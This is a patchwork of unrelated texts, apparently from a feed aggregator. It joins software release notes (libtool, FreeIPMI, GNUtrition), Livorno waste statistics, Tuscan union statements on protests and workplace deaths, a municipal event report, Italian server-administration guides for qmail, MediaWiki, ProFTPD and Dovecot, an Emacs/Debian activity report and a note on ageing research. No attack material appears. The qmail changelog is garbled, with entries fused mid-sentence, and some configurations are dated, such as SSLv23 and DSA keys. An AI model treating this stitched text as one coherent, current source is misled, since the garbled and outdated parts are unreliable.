- Pass 'resource-dir=*' flag for Clang.
- Recognise explicit shared library arguments when linking dependency
libraries to a shared library, like exists when linking a program.
- Support OpenMP with macOS clang by processing '-Xpreprocessor
-fopenmp' as one token.
** Bug fixes:
- Store cygpath file path conversions correctly for MSYS2 and MSVC.
- Fix syntax error in LT_PROG_OBJC and LT_PROG_OBJCXX.
- Separate Objective C and C++ cache check for proper tagging support.
- Fix in darwin to support values with spaces.
- Limit the length of DLL name to 8.3 correctly to avoid corrupting a
generated DLL on OS/2.
- Remove unused variable on OS/2, which could cause issues with static
library generation if defined.
- Recognise more static linking options for Clang.
- Fix emscripten CXX postdeps using non-PIC sysroot.
- Avoid deprecated option '-o' with MSVC compilers and replace with '-Fe'.
- Avoid overlinking of dependency libraries on ELF systems.
- Ensure old libraries are not archived.
** Changes in supported systems or compilers:
- Add support for SlimCC compiler.
- Add support for *-ironclad-gnu.
Enjoy!

| RIFIUTI URBANI TRATTATI | Marzo 2026 | TOTALE ANNO 2026 |
| Carta e cartoni | 746,30 | 2.274,15 |
| Imballaggi in vetro | 416,77 | 1.223,03 |
| Multimateriale Leggero | 696,24 | 1.950,57 |
| Legno e ingombranti | 507,91 | 1.331,09 |
| Frazione organica e compostabili | 1.483,17 | 4.168,26 |
| RAEE | 59,65 | 176,41 |
| Altre RD | 207,32 | 601,03 |
| Macerie | 109,62 | 271,54 |
| Rifiuto indifferenziato | 2.494,35 | 7.499,96 |
| Totale tonnellate | 6.721,32 | 19.496,04 |
| Efficienza % raccolta differenziata | 62,89% | 61,53% |
| Variaz. efficienza % RD su anno 2025 | +0,6% | -1,37% |
L'articolo Tonnellate di rifiuti urbani raccolti e trattati Marzo 2026 proviene da Aamps Livorno.
USB esprime piena solidarietà alle decine di attivisti, studenti, lavoratrici e lavoratori raggiunti da denunce in relazione alle mobilitazioni che negli ultimi anni hanno attraversato Pisa contro la guerra, il riarmo e in sostegno del popolo palestinese.
Le oltre 60 denunce rappresentano un fatto grave che si inserisce in un contesto nazionale caratterizzato da un progressivo irrigidimento delle politiche di ordine pubblico e da una crescente limitazione degli spazi di agibilità democratica e di conflitto sociale. A Pisa, città che è stata protagonista di importanti mobilitazioni contro la guerra e il genocidio del popolo palestinese, l'accanimento repressivo colpisce proprio coloro che hanno animato quelle piazze, dalle iniziative nelle università alle manifestazioni cittadine, fino ai grandi cortei che hanno accompagnato gli scioperi generali promossi da USB il 22 settembre e il 3 ottobre.
E’ stato un autunno incredibile, milioni di persone in piazza in tutta Italia ma ci sono voluti due anni di genocidio in diretta perché questo avvenisse. Attorno agli scioperi generali indetti da USB e dal sindacalismo conflittuale si è sviluppato un movimento di massa che ha unito lavoratori, studenti, precari e realtà sociali sotto la parola d'ordine chiara: "Blocchiamo tutto". Migliaia di persone sono scese in piazza per denunciare il genocidio del popolo palestinese, opporsi alle politiche di guerra, al riarmo e alla complicità del governo italiano con l'escalation militare israeliana. Quelle giornate hanno rappresentato un momento alto di partecipazione popolare e di ricomposizione sociale, dimostrando che esiste nel Paese una larga opposizione alle logiche della guerra e dell'economia di guerra.
È proprio quella forza espressa nelle piazze a essere oggi oggetto di un tentativo di intimidazione. Dietro questa operazione non vediamo soltanto la volontà di perseguire singoli episodi, ma un disegno più ampio volto a colpire chi organizza conflitto sociale, solidarietà internazionale e opposizione alle politiche governative. In una fase segnata dall'aumento delle spese militari, dal peggioramento delle condizioni di vita e di lavoro e dall'inasprirsi dei conflitti internazionali, la risposta delle istituzioni sembra essere sempre più quella della repressione.
Le immagini delle cariche contro gli studenti che manifestavano pacificamente per chiedere la fine del massacro del popolo palestinese restano impresse nella memoria della nostra città. Oggi, a quelle violenze, si aggiunge una nuova offensiva che passa attraverso denunce e procedimenti giudiziari rivolti a chi ha esercitato il diritto di manifestare.
USB ribadisce che la solidarietà al popolo palestinese, il rifiuto della guerra e delle politiche di riarmo, la difesa dei diritti sociali e democratici non possono essere criminalizzati. Le mobilitazioni che hanno attraversato Pisa e il Paese in questi anni hanno rappresentato una risposta concreta alla normalizzazione della guerra e all'indifferenza verso il dramma vissuto dal popolo palestinese. Sono state piazze partecipate, popolari e determinate, che hanno rimesso al centro il valore dell'internazionalismo e della solidarietà tra i popoli, che hanno visto dopo tanti anni migliaia di lavoratrici e lavoratori aderire a uno sciopero politico e scendere in piazza.
Per questo riteniamo fondamentale costruire la più ampia solidarietà nei confronti delle persone colpite dalle denunce, sostenendole sul piano politico e legale. Nelle prossime settimane promuoveremo momenti pubblici di confronto e iniziative di sostegno, coinvolgendo avvocati, associazioni, realtà sociali e sindacali, con l'obiettivo di contrastare l'ondata repressiva e difendere gli spazi di partecipazione democratica.
Di fronte a questo tentativo di intimidazione, la risposta deve essere collettiva. Le decine di migliaia di persone che hanno riempito le piazze dell'autunno contro il genocidio del popolo palestinese e contro la guerra dimostrano che non si può reprimere un movimento che affonda le proprie radici nella giustizia sociale, nella pace e nella solidarietà internazionale.
In quelle piazze c'eravamo tutti. E continueremo ad esserci.
Unione Sindacale di Base - Federazione di Pisa

Stamattina a Rosignano Solvay un operaio di trent'anni è morto. Caduto dal tetto di un'azienda in via degli Artigiani, dove stava sostituendo pannelli. Il tetto ha ceduto. Era il suo primo giorno di lavoro in quella ditta. Trent'anni. Primo giorno di lavoro. Ucciso sul lavoro.
Ieri, ad Amendolara, in Calabria, sulla Statale 106, quattro braccianti di origine afghana — Waseem, Amin, Ullah e Safi — sono morti carbonizzati all'interno di un'auto, in un'area di servizio. Lavoratori sfruttati, stretti nella morsa del caporalato che da anni controlla la Piana di Sibari. Erano in Italia con regolare permesso di soggiorno da diversi anni. Si trattava di persone, lavoratori, non merce.
Cinque morti in due giorni. E siamo solo al 4 giugno.
Questo è il capitalismo italiano. Questo è il mercato del lavoro che ci vogliono far accettare.
Non si tratta di fatalità, di sfortuna, di circostanze accidentali. Si tratta di un sistema che deliberatamente comprime il costo del lavoro fino all'osso, che trasforma i lavoratori in corpi usa e getta, che scarica sui più deboli, i precari, i migranti, chi non può permettersi di dire no, il rischio di morire per un salario quasi sempre sotto la soglia di povertà. Turni massacranti, paghe misere o nulle, schiavismo. E quando il corpo cede o il tetto crolla, li abbandonano sul ciglio della strada come oggetti consumati.
Il caporalato non è un'anomalia del Sud. La precarietà mortale non è un'anomalia del Nord. Sono le due facce dello stesso sistema: quello che antepone il profitto alla vita, quello che usa la ricattabilità economica come arma di controllo sui lavoratori.
USB rivendica con forza quello che questo sistema nega ogni giorno: il lavoro deve essere sicuro, sempre, per tutti. Questo significa rispetto rigoroso delle norme antinfortunistiche, formazione obbligatoria prima di mettere piede su un cantiere, dispositivi di protezione reali e funzionanti, rappresentanti dei lavoratori per la sicurezza con poteri effettivi, compreso il blocco immediato delle lavorazioni a rischio. E significa responsabilità penale certa per chi uccide risparmiando sulla sicurezza.
C'è poi il nodo legato ai salari che devono essere adeguati a una vita dignitosa. Perché la povertà salariale e la precarietà contrattuale non sono questioni separate dalla sicurezza: sono la stessa questione. Chi è ricattabile sul contratto è ricattabile anche sulla propria incolumità. Chi non può permettersi di rifiutare un lavoro pericoloso, un turno in più, un'ora sul tetto senza protezioni, è un lavoratore che il sistema espone deliberatamente alla morte. La fame è una forma di coercizione e il caporalato ne è l'espressione più brutale.
Sicurezza, stabilità e dignità sul lavoro sono la scelta politica che pretendiamo da chi governa. È inutile che la politica si batta il petto davanti alle bare: dietro ogni morte sul lavoro c'è la sua firma.
USB Toscana esprime il proprio cordoglio alle famiglie di tutti questi lavoratori. Trasformiamo il dolore in rabbia di classe e in lotta organizzata.






In mezzo alla gente, ma con discrezione ed efficienza. Gli operatori di AAMPS/Retiambiente hanno contribuito alla riuscita dell’evento Straborgo che da venerdì 29 maggio a sabato 1 giugno ha visto migliaia di persone, tra cittadini e turisti, affollare le strade del quartiere. Una presenza continuativa per garantire la pulizia di Piazza Mazzini e delle strade limitrofe e realizzare la raccolta dei rifiuti sia con la vuotatura dei contenitori stradali sia con la raccolta dei materiali differenziati prodotti con quantitativi ingenti dagli esercenti della zona.
“Questa tipologia di manifestazione – commenta Aldo Iacomelli, Amministratore Unico AAMPS/Retiambiente – risulta per noi sempre particolarmente impegnativa soprattutto nel periodo estivo che prevede un’articolazione complessa dei nostri servizi di raccolta e spazzamento. Dobbiamo operare h24 e, allo stesso tempo, districarci tra la folla garantendo sempre le opportune condizioni di sicurezza per i nostri lavoratori e i cittadini. Siamo particolarmente soddisfatti nell’essere riusciti a dare il nostro contributo. Ho il piacere di sottolineare – conclude Iacomelli – la cooperazione che abbiamo riscontrato da parte degli organizzatori, degli abitanti del quartiere e degli esercenti che si sono prodigati per rispettare le regole straordinarie di conferimento dei rifiuti differenziati”.
“Lo dico da sempre – afferma Luca Salvetti, Sindaco di Livorno. AAMPS/Retiambiente è un’azienda che funziona egregiamente nell’erogazione dei servizi resi alla cittadinanza e questi eventi ne sono la riprova. Senza i puntuali servizi di spazzamento e raccolta dei rifiuti non saremmo qui a parlare del successo di Straborgo. Ringrazio i lavoratori per il consueto impegno profuso, gli abitanti del quartiere per la disponibilità concessa e gli esercenti per avere collaborato al meglio delle rispettive possibilità. Ora sotto con le altre kermesse in programma per la lunga stagione estiva”.
L'articolo “Straborgo”: servizi di pulizia e raccolta rifiuti efficaci e puntuali proviene da Aamps Livorno.
L'articolo Addio Carola proviene da Guerre di Rete.
Quotando la definizione di D. J. Bernstein
qmail è un mail transfer agent semplice, sicuro ed affidabile. è stato progettato per dei server UNIX connessi alla rete internet
E' possibile reperire una introduzione più che comprensibile su come funziona un mail server in questa pagina. Anche la "qmail newbie's guide to relaying" di Chris Johnson (copia locale... è destino che tutto quello che riguarda qmail vada piano piano sparendo) è molto chiara e la sua lettura è fondamentale all'inizio.
Lo scopo di questa piccola guida NON è insegnare come funziona un server di posta, anche se alla fine si spera che uno che l'abbia seguita riesca ad avere un server funzionante. Questi appunti servono principalmente a ricordare i passi principali da seguire per avere una installazione veloce di qmail e di alcuni software correlati. Ho deciso di scriverla a causa della mancanza di ogni aggiornamento della documentazione riguardante le "distribuzioni" di qmail che mi erano familiari, nella speranza che ciò possa essere di aiuto anche a qualcun altro. Ovviamente il divertimento è stato una componente decisiva.
Pertanto, per conoscere in dettaglio come funziona un mail server, sei invitato a leggere con cura almeno i riferimenti che menzionerò in ogni pagina.
In secondo luogo, NON sono io il responsabile di quello che fai con il tuo server ;-). Usa la mia guida a tuo rischio.
Infine, i commenti, le critiche e i suggerimenti sono sempre benvenuti! :-)
Questa guida è stata scritta senza una particolare distribuzione Linux in mente. L'ho testata su due miei server di posta virtuali basati su Slackware, sia a 64 che a 32 bit, e diverse persone là fuori confermano che essa funziona nelle altre distribuzioni Linux più comuni. La compilazione dei miei pacchetti è stata testata anche su piattaforme FreeBSD, OpenBSD, NetBSD.
Se vale la definizione data da Bernstein probabilmente lo è. Tuttavia, a mio modo di vedere, un toaster dovrebbe essere una cosa alla Bill Shupp o alla qmailtoaster, che viene rilasciata insieme a tutti i pacchetti necessari, diversamente da qui. Poichè preferisco lasciare che il visitatore controlli da sè l'esistenza delle ultime versioni dei vari software, direi che questa "cosa" non dovrebbe essere classificata come un toaster. Piuttosto la chiamerei semplicemente "Roberto's qmail notes". Per la verità, sto inserendo qui un paragrafo sul toaster giusto per soddisfare i motori di ricerca, dato che molta gente arriva qui cercando un toaster per qmail.. :-) e ora che ho scritto la parola toaster 5 o 6 volte possiamo veramente iniziare... :-))
Questi appunti sono stati scritti in inglese e poi tradotti in italiano alla velocità della luce. Si vede, vero? Rileggendo ora, trovo degli strafalcioni e delle traduzioni letterali alla "Google translate"!. Me ne scuso, ma non ho sempre il tempo di fare le cose nel modo migliore..
Roberto's qmail notes is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
A test release of GNUtrition, 0.33.0rc5, is now available.
GNUtrition is free nutrition analysis software. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.
This release fixes bugs from 0.33.0rc1-rc4, removes inaccurate algorithm constants, removes additional unnecessary dependencies, improves reliability/usability on non-GNU systems, among other general improvements and bug fixes. Version 0.33.0 (the first ftp.gnu.org release of GNUtrition since 2012) is expected to be released by June 5th. Any and all testing for the upcoming release will be greatly appreciated. Please use the bug-gnutrition and help-gnutrition mailing lists for your bug reports and/or other questions.
More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:
ftp://alpha.gnu.o ... g/gnu/gnutrition/
http://alpha.gnu. ... g/gnu/gnutrition/
https://alpha.gnu ... g/gnu/gnutrition/
Please report any problems you experience to the GNUtrition bug reports mailing list: bug-gnutrition@gnu.org (https://lists.gnu ... fo/bug-gnutrition).
Il CD e CS hanno deciso la data per l’annuale Assemblea Generale Ordinaria dei Soci, con l’esposizione di quanto è accaduto nell’anno passato e nei mesi di quello in corso.
L’AGO 2026 si terrà in data 21/06/2026 alle ore 09:00, presso il Circolo ARCI a Stagno, via Curiel, 21.
o Support new "altbridging" workaround in ipmi-sensors.
o Fix exploitable buffer overflows in the following ipmi-oem
commands:
- ipmi-oem dell get-active-directory-config
- ipmi-oem fujitsu get-sel-entry-long-text
https://ftp.gnu.o ... pmi-1.6.18.tar.gz
Mediawiki offre la possibilità di inserire formule Tex nelle nostre pagine creando dinamicamente immagini PNG per noi..
Questa pagina vuole richiamare i pacchetti e i principali passi da seguire per far funzionare Tex con MediaWiki in una macchina Slackware. Alla fine presenterò alcune problematiche nell'installzione.
Ghostscript è già incluso in Slackware (ap/ghostscript e ap/ghostscript-fonts-std) ma se siamo in un server minimale potresti avere bisogno di installarlo.
Questa libreria la troviamo all'interno del pacchetto x/fontconfig. E' richesta da ImageMagick.
wget http://www.imagemagick.org/download/ImageMagick-6.7.6-5.tar.bz2
tar xvfj ImageMagick-6.7.6-5.tar.bz2
cd ImageMagick-6.7.6-5
chown -R root:root .
./configure \
--without-x \
--with-png \
--with-freetype \
--with-dps \
--with-gslib
make
make install
ldconfig
Provare a digitare, dalla linea di comando
/usr/local/bin/convert logo: logo.gif
Se viene generato il file PNG tutto funziona come si deve.
wget http://caml.inria.fr/pub/distrib/ocaml-3.12/ocaml-3.12.0.tar.bz2 tar xjf ocaml-3.12.0.tar.bz2 cd ocaml-3.12.0 chown -R root:root . ./configure make make install
Download: http://sourceforge.net/projects/dvipng/
Prerequisiti:
PATH=$PATH:/usr/share/texmf/bin/ export PATH
Ricordare di salvare ciò anche nel profile.
Per evitare problemi nel link di kpathsea configurare come segue
./configure LDFLAGS='-L/usr/share/texmf/lib/' CPPFLAGS='-I/usr/share/texmf/include/' make make install
Senza AMS* alcune formule saranno rese correttamente mentre altre no. Il pacchetto tetex di Slackware contiene già AMS, comunque, nel caso non ce l'avessi:
cd /usr/share/texmf wget ftp://ftp.ams.org/pub/tex/amslatex.zip wget ftp://ftp.ams.org/pub/tex/amsrefs/amsrefs.zip unzip amslatex.zip unzip amsrefs.zip
dovresti trovarlo in /usr/share/texmf/tex/latex/amsmath/amsmath.sty
Cambiare directory dove è installato mediawiki, editare LocalSettings.php e decommentare questo:
$wgUseTeX = true;
cd /path/to/htdocs/mediawiki/math
Prima di compilare, per evitare un parse error, usare il PATH assoluto ovunque all'interno di math/render.ml in questo modo:
let cmd_dvips tmpprefix = "/usr/share/texmf/bin/dvips -q -R -E " ^ tmpprefix ^ ".dvi -f >" ^ tmpprefix ^ ".ps" let cmd_latex tmpprefix = "/usr/share/texmf/bin/latex " ^ tmpprefix ^ ".tex >/dev/null" (* Putting -transparent white in converts arguments will sort-of give you transperancy *) let cmd_convert tmpprefix finalpath = "/usr/local/bin/convert -quality 100 -density 120 " ^ tmpprefix ^ ".ps " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_convert_error" (* Putting -bg Transparent in dvipng's arguments will give full-alpha transparency *) (* Note that IE have problems with such PNGs and need an additional javascript snippet *) (* Putting -bg transparent in dvipng's arguments will give binary transparency *) let cmd_dvipng tmpprefix finalpath backcolor = "/usr/local/bin/dvipng -bg \'" ^ backcolor ^ "\' -gamma 1.5 -D 120 -T tight --strict " ^ tmpprefix ^ ".dvi -o " ^ finalpath ^ " >/dev/null 2>/tmp/wiki_dvipng_error"
Ora compiliamo
make
Provare a mettere dentro una pagina wiki qualcosa come
0
e cerchiamo di vedere cosa succede. Questo è il messaggio di errore più frequente:
Failed to parse (PNG conversion failed; check for correct installation of latex, dvips, gs, and convert)
Controlliamo se gli eseguibili sono nel path:
# ls -lH `which gs` `which latex` `which dvips` `which convert` -rwxr-xr-x 1 root root 5977916 2008-12-05 23:36 /usr/bin/gs* -rwxr-xr-x 1 root root 23410 2010-11-21 15:22 /usr/local/bin/convert* -rwxr-xr-x 1 root root 209308 2007-06-28 04:51 /usr/share/texmf/bin/dvips* -rwxr-xr-x 1 root root 1010984 2007-06-28 04:51 /usr/share/texmf/bin/latex*
Abilitiamo il log degli errori. Inserire una linea come questa in LocalSettings.php
$wgDebugLogFile = "/tmp/wiki.log";
Apriamo questo file e cerchiamo una riga come questa ;
TeX: ./math/texvc '/path/to/htdocs/mediawiki/images/tmp' '/path/to/htdocs/mediawiki/images/tmp' '0' 'UTF-8' 'transparent' TeX output: Ccfcd208495d565ef66e7dff9f98764da0 0 ---
Cerchiamo ora di eseguire il comando texvc dalla linea di comando come utente apache:
cd math sudo -u apache ./texvc '../images/tmp' '../images/tmp' '0' 'UTF-8' 'transparent'
a controlliamo il PNG nella cartella images/tmp. Se si ottiene ancora un parse error, si ricontrolli il path assoluto in math/render.ml, e si ricompili. E si rileggano le referenze indicate.
Ecco come ho installato mod_tls (ftpes) e mod_sftp in proftpd. I miei tentativi di farli convivere in due demoni separati sono tutti falliti, giacchè ho registrato errori nel trasferimento che sono spariti solo quando ho provato a caricare mod_tls o mod_sftp a turno.
Questi i miei test sulla velocità (per la verità un po' frettolosi). ftpes sembra un pochino più veloce in modalità upload:
ftpes
upload: circa 22.4 K/s
download: più di 800 K/s
sftp
upload circa 18.2 K/s
download: più di 800 K/s
./configure \
--prefix=/usr/local \
--without-pam --disable-auth-pam \
--enable-openssl \
--with-modules=mod_ratio:mod_readme:mod_sftp:mod_tls
ftpes.conf# common stuff goes here
Include /usr/local/etc/proftpd/proftpd.conf
<IfModule mod_tls.c>
TLSEngine on
PassivePorts 49152 65535
#MasqueradeAddress 012.345.678.901 # se il server e' dietro un firewall
TLSLog /var/log/proftpd/tls.log
TLSProtocol SSLv23
# Require protection on the control channel, but reject protection of the data channel
TLSRequired ctrl+!data
TLSRSACertificateFile /usr/local/etc/ssl/certs/proftpd.pem
TLSRSACertificateKeyFile /usr/local/etc/ssl/certs/proftpd.pem
TLSVerifyClient off
TLSRenegotiate none
</IfModule>
sftp.conf# common stuff
Include /usr/local/etc/proftpd/proftpd.conf
<IfModule mod_sftp.c>
SFTPEngine on
SFTPLog /var/log/proftpd/sftp.log
Port 22
SFTPHostKey /etc/ssh/ssh_host_rsa_key
SFTPHostKey /etc/ssh/ssh_host_dsa_key
SFTPCompression delayed
MaxLoginAttempts 6
</IfModule>
Infine avviare il demone richiamando il file di configurazione desiderato:
/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf # se si vuole ftpes /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf # se si preferisce sftp
Non avviarli mai insieme.
proftpd.confServerType standalone
UseReverseDNS off
DeferWelcome off
Port 21
Umask 022
MaxInstances 30
User ftp
Group ftp
SystemLog /var/log/proftpd/proftpd.log
TransferLog /var/log/proftpd/xferlog
<Global>
<Directory /*>
AllowOverwrite on
</Directory>
</Global>
<VirtualHost 123.456.789.123>
ServerName "ProFTPD"
DefaultRoot ~/www
DefaultServer on
</VirtualHost>
#!/bin/sh
#
# /etc/rc.d/rc.proftpd
#
start() {
/usr/local/sbin/proftpd -c /usr/local/etc/proftpd/ftpes.conf
#-n -d 20 for backup
# /usr/local/sbin/proftpd -c /usr/local/etc/proftpd/sftp.conf
echo "Server started."
}
stop() {
/bin/killall proftpd
echo "Server stopped."
}
restart() {
stop
sleep 3
start
#/bin/killall -HUP proftpd
echo "Server restarted."
}
case "$1" in
'start')
start
;;
'stop')
stop
;;
'restart')
restart
;;
*)
echo "usage $0 start|stop|restart"
esac
Il progetto Pigeonhole fornisce il supporto Sieve a livello di plugin per il Local Delivery Agent (LDA) di Dovecot e anche per suo servizio LMTP. Il plugin è un interprete Sieve che filtra i messaggi in arrivo usando uno script scritto in linguaggio Sieve. Lo script Sieve è fornito dall'utente e, con il suo utilizzo, l'utente può personalizzare come i messaggi in arrivo sono trattati. I messaggi possono essere spediti a una cartella specifica, reindirizzati, rispediti al mittente, scartati, etc.
Il Server Dovecot Managesieve è un servizio per gestire la collezione di script Sieve dell'utente.
Se vuoi supportare i filtri per le email, devi gestire le Sieve rules per mezzo del server dovecot-pigeonhole. Quando crei un filtro con la tua webmail o il tuo client di posta, stai scrivendo uno script in linguaggio Sieve per personalizzare il modo in cui i tuoi messaggi saranno recapitati, vale a dire se saranno inoltrati a qualcun altro, scartati o salvati in delle cartelle particolari. Ma per fare questo Dovecot deve agire anche come un Local Delivery Agent al posto di vpopmail/vdelivermail, ovvero deve essere Dovecot a salvare i messaggi nella tua cartella Maildir. Questa guida cercherà di spiegare come raggiungere questo obiettivo.
spamhaus da connessioni fatte con DNS pubblico.- DKIM: added ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)qmail-dkim error reporting when signing outgoing messages (Andreas Gerstlauer)helodnscheck.cpp: qmail dir determined dinamicallyqmHandle: Add -x and -X parametr for remove email by To/Cc/Bcc (by Stetinac)qmail-spp greylisting plugin to solve a compilation break on rocky 8 (tx Shailendra Shukla)vpopmaild doesn't work when SHA-512 passwords have been enabled on vpopmail (--disable-sha512-passwords). All SQL queries have been updated.libev are now installed in /usr/local/include/libev (was /usr/local/include) to avoid conflicts with libevent (they both have an event.h header file). vusaged configure command was adjusted accordingly.--enable-sqmail-cdbsimscan now defines the maximum size of messages to be passed to spamassassin via control/simsizelimit filevpopmail e nuovo plugin qmailforward per Roundcube che vanno a risolvere diverse problematiche. Maggiori informazioni nella pagina dedicata..Debian, dove python2 non è presente (grazie a Gabriel Torres)convert-multilog program. In case you decide to stick with the original timestamp, then use the original convert-multilog. (diff)ExtractText notes have been revised and corrected by Gabriel Torrescmd_learn and the multi_driver driversqmailadmin: added the ezmlm-idx 7 compatibility patchDKIMKEY=/var/qmail/control/domainkeys/%/default" from the qmail rc config file, as DKIMKEY is actually ignored by dk-filter, which will look for the key in that location by default. Use DKIMSIGN instead to define yor domainkey location (thanks to Steffen for the hint)dovecot: the user query on the auth is now able to manage pop3/imap/webmail vpopmail limits (thanks to Arturo Blanco)vQadmin: combined patch released (more info inside the patch itself)qmail-remote.c that was causing the sending of an additional ehlo greeting (thanks to Cristoph Grover)qmailadmin: added a patch to log auth failures (thanks to Tony)fail2ban: added a filter against qmailadmin log failuresqmailadmin: added a patch to check for the password strenghtextra.h to record the Message-ID in the qmail-send's log (thanks to Simone for the hint). Look here for details.simscan has been improved with the jms patch. The work dir is mounted as a ramdisk nowfail2ban: qmail-smtp.conf filter updated to look for GREETDELAY linesdovecot because of security reasons (more info here)dovecot upgraded to v. 2.2.14dovecot-pigeonhole recompileddovecot upgraded to v. 2.2.14.rc1dovecot-pigeonhole upgraded to v. 0.4.3/usr/local/dovecot/etc/sieve/roundcube upgraded to v. 1.0.3.roundcube-auth filter to fail2banroundcube upgraded to v. 1.0.2. Fixed some errors in the relative page, as sometime the $config variable was still $rcmail_config as in the past, and all the config files are now merged into config.inc.php (thanks to Otto)clamav upgraded to v. 0.98.3roundcube upgraded to v. 1.0.1ezmlm-idx upgraded to v. 7.2.2qmailadmin recompiled against ezmlm-idx-7.2.2ezmlm-idx upgraded to v. 7.2.0ezmlm-idx, getting the program to be compliant with the Yahoo DMARC Policy Change. You have to recompile qmailadmin against ezmlm as well.qmail-maxrcpt patch, which allows you to set a limit on how many recipients are specifiedroundcube upgraded to v. 1.0.0qmail-smtpd-liberal-lf patch, which allows qmail-smtpd to accept messages that are terminated with a single \n instead of the required \r\n sequence. This should avoid some "read failed" reject.dovecot: upgraded to v. 2.1.10dovecot: upgraded to v. 2.1.9dovecot: upgraded to v. 2.1.6qmail-tap added to my combined patchdovecot: upgraded to v. 2.1.1auth_socket_path variable inside 10-mail.confdovecot: upgraded to v. 2.1.0dovecot-pigeonhole: upgraded to v.0.3.0esmtp-size patch added to my combined patchdoublebounce-trim patchRoundcube: updated to v. 0.7.1. All plugins have been updated to latest version as well.dnsbl.sorbs.org is not on my RBL examples anymore, as it proved to be a bad list. It's rejecting gmail's IPs and also confusing the IP of my own server as dynamic.update_tmprsadh to chown the .pem files to vpopmail to avoid hang-ups during the smtp conversation on port 587 caused by permission problems. qmail-remote.c which was not going into tls on authentication (thanks to Krzysztof Gajdemski)force-tls now quits if the starttls command is not provided when required (thanks to Jacekalex)Dovecot: upgraded to v. 2.0.15dovecot-pigeonhole: upgraded to v . 0.2.4RoundCube: upgraded to v. 0.6. All plugins have been updated to latest versionRoundCube: upgraded to v. 0.5.4 (security fix)force-tls patch allows the management of STARTTLS and CRAM-MD5 variables in the run file, so that there's no need to recompile each time anymore.qmail-inject-null-sender" patch by Stéphane Cottin, which addresses a bug on qmail-injectdovecot was updated to allow maildir++ (thanks to Nicolas) on files 90-quota.conf and 20-imap.confqmail on 64b platforms has been fixedrblsmtpd. Added a page about the greetdelay patch.ext-todo and big-todo patches, which adress the "silly qmail syndrome" on big servers.Spamassassin: updated to v. 3.3.2Roundcube: updated to v. 0.5.3 (2 important bug fixes)Dovecot: added a page concerning the purging of expired emails from Trash/JunkRoundCube: updated to v. 0.5.2. Updated almost all roundcube's plugin to latest version.qmail-rblchk---------
Questa pagina concerne il setup di alcuni filtri di rete che aiutano spamassassin a decidere cosa fare di un dato messaggio. Abilitando questi filtri, insieme al sistema di apprendimento bayesiano, migliorerà drasticamente le prestazioni di spamassassin nella lotta allo spamming.
vpopmaild del plugin password è nuovamente funzionante, ora che il problema è stato sistemato dal lato vpopmail (versione 5.6.7 in poi).
Le SURBL sono liste di siti web che appaiono nel corpo della posta indesiderata. Diversamente dalla maggior parte delle liste non sono liste di indirizzi IP.
I siti web che appaiono nei messaggi di posta indesiderata tendono ad essere più stabili rispetto agli indirizzi IP in rapido cambiamento dei botnet che sono soliti inviare la maggior parte di questi messaggi. Le liste di IP come zen.spamhaus.org possono essere usate in un primo stadio di filtraggio per aiutare a identificare da circa l'80% al 90% dei messaggi di posta indesiderata. Le liste SURBL possono contribuire a eliminare il restante 75% della posta indesiderata in un successivo stadio di filtraggio. Usate insieme alle liste di IP (RBL), le SURBL risultano un metodo molto efficace per identificare fino al 95% della posta indesiderata.
fehQlibs-31Le fehQlibs sono librerie C aggiuntive sviluppate da Erwin Hoffmann. Sono un prerequisito di ucspi-tcp6 e di ucspi-ssl.
Installare come segue in /usr/local:
FEQLIBS_VER=31
cd /usr/local
wget https://www.fehcom.de/ipnet/fehQlibs/fehQlibs-${FEQLIBS_VER}.tgz
tar xzf fehQlibs-${FEQLIBS_VER}.tgz
chown -R root:root fehQlibs-${FEQLIBS_VER}
cd fehQlibs-${FEQLIBS_VER}
Cambiare la cartella di installazione modificando il file conf-build come segue
LIBDIR=/usr/local/lib HDRDIR=/usr/local/include
Compilare e installare
make -C src
make -C src shared
make -C src install
cd ..
rm qlibs
ln -s fehQlibs-${FEQLIBS_VER} qlibs
Le qlibs dovranno essere trovate al momento della compilazione di ucspi-tcp6, quindi dobbiamo aggiungerle al file /etc/ld.so.conf:
echo "/usr/local/qlibs" >> /etc/ld.so.conf ldconfig
In genere nei sistemi Unix si può lanciare questo comando per ottenere lo stesso risultato e linkare le librerie qlib:
ldconfig -m /usr/local/qlibs
Su NetBSD ho messo questo nel .profile
export LD_LIBRARY_PATH=/usr/local/qlibs${LD_LIBRARY_PATH:+:$LD_LIBRARY_PATH} 
Hello and welcome to my May 2026 free software activities report. A lot's been going on in my life offline so I took a bit of a hiatus from doing these reports, but I've had a fairly productive month of May so I thought it'd be nice to do another one for this month.
ffs package for
GNU Emacs on GNU ELPA. Many thanks to Protesilaos for rounds of
code review and feedback for improving and polishing the package
in preparation for submission to GNU ELPA.Somebody wants you to give them money
error due to the anti-bot challenge being served with a HTTP 402
(Payment Required) response. So I landed a patch 12eec781ed6 to
no longer do that. Thanks to Emacs comaintainer Sean Whitton
for reviewing and approving my proposed patch.<input type="submit">
HTML buttons, <button> elements were not tab-stoppable, leading
to poorer usability and accessibility. So I landed a patch
ec3d662de0b to fix that. Thanks to Emacs comaintainer Eli
Zaretskii for reviewing, providing feedback, and accepting my
proposed change.indicate-buffer-boundaries
and my convenience configuration macros.I've begun the work toward updating the Jami package in Debian unstable again, which means I need to package new releases of its direct and indirect dependencies. For OpenDHT, I need to update RESTinio, and to do that I first need to package expected-lite and sobjectizer for Debian:
I've been working on packaging both and hope to have them uploaded to the archive in the next days and weeks.
That's it for this month's report.
Take care, and so long for now.



Che cosa c’è dietro un’importante affermazione dell’università di Yale sull’invecchiamento? Lo studio di un suo team di scienziati ribalta l’opinione che diventare anziani sia un male: l’avanzare dell’età offre possibilità di miglioramento, perché? Gli studiosi affermano che è proprio il pensiero degli anziani sull’invecchiare a influenzare un processo che fa i conti con la salute ma ha anche delle potenzialità. Quindi, sono mentalità e pregiudizi che possono incidere sulla qualità della vita dopo gli anta.
